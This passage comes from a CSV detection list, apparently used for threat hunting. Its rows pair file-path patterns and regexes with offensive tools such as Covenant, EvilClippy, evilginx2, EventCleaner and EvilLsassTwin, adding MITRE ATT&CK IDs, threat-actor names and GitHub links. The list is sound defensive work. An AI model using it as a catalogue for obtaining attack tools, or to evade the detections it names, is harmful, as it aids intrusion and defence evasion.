T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*\ELF\serverscan*",".{0,1000}\\ELF\\serverscan.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","0","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*\Elite.csproj*",".{0,1000}\\Elite\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*\Elite.sln*",".{0,1000}\\Elite\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*\emailall.py*",".{0,1000}\\emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","0","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*\empire_exec.py*",".{0,1000}\\empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\enable_all_tokens.exe*",".{0,1000}\\enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\EnableAllTokenPrivs.cs*",".{0,1000}\\EnableAllTokenPrivs\.cs.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable 
TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*\EnableAllTokenPrivs.exe*",".{0,1000}\\EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*\EnableAllTokenPrivs.ps1*",".{0,1000}\\EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*\Enable-DuplicateToken.ps1*",".{0,1000}\\Enable\-DuplicateToken\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\enc_shellcode.bin*",".{0,1000}\\enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\enc_shellcode.h*",".{0,1000}\\enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","159","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" "*\enc-rot13.ps1*",".{0,1000}\\enc\-rot13\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\encryption_aes.exe*",".{0,1000}\\encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\encryption_rc4.exe*",".{0,1000}\\encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\enterprise_admins.txt*",".{0,1000}\\enterprise_admins\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\enum_av.py*",".{0,1000}\\enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\enum_dns.py*",".{0,1000}\\enum_dns\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a 
post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\enum4linux.py*",".{0,1000}\\enum4linux\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\EnumBrowsers.ps1*",".{0,1000}\\EnumBrowsers\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\enumeration_process.exe*",".{0,1000}\\enumeration_process\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" 
"*\ES.Alan.Core*",".{0,1000}\\ES\.Alan\.Core.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*\EternalHushCore.dll*",".{0,1000}\\EternalHushCore\.dll.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*\EternalHushCore\*",".{0,1000}\\EternalHushCore\\.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*\ethminer.exe*",".{0,1000}\\ethminer\.exe.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*\etw-fuck.cpp*",".{0,1000}\\etw\-fuck\.cpp.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*\etw-fuck.exe*",".{0,1000}\\etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*\ETWHash.*",".{0,1000}\\ETWHash\..{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*\ETWpatch\eventK.exe*",".{0,1000}\\ETWpatch\\eventK\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 
- T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\etwunhook.cpp*",".{0,1000}\\etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*\etwunhook.exe*",".{0,1000}\\etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*\Evasion\Sandbox Evasion\*.c*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Evasion\Sandbox Evasion\*.exe*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\EventCleaner.cpp*",".{0,1000}\\EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.exe*",".{0,1000}\\EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.log*",".{0,1000}\\EventCleaner\.log.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.pdb*",".{0,1000}\\EventCleaner\.pdb.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.sln*",".{0,1000}\\EventCleaner\.sln.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner-master*",".{0,1000}\\EventCleaner\-master.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventLogCrasher\*",".{0,1000}\\EventLogCrasher\\.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*\EventViewer-UACBypass*",".{0,1000}\\EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\evil_pdf\*",".{0,1000}\\evil_pdf\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\evil_script.py*",".{0,1000}\\evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\EvilClippy*",".{0,1000}\\EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 
4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*\EvilClippy-*.zip*",".{0,1000}\\EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*\evilclippy.cs*",".{0,1000}\\evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*\evilginx2\*",".{0,1000}\\evilginx2\\.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*\EvilLsassTwin\*",".{0,1000}\\EvilLsassTwin\\.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*\EvilnoVNC*",".{0,1000}\\EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 
- TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*\EvilnoVNC\*",".{0,1000}\\EvilnoVNC\\.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*\evil-proxy.rb*",".{0,1000}\\evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*\evil-proxy\*",".{0,1000}\\evil\-proxy\\.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*\evilrdp\*",".{0,1000}\\evilrdp\\.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*\evilscript.ps1*",".{0,1000}\\evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\evilSignatures.db*",".{0,1000}\\evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*\EvilSln\*.suo*",".{0,1000}\\EvilSln\\.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense 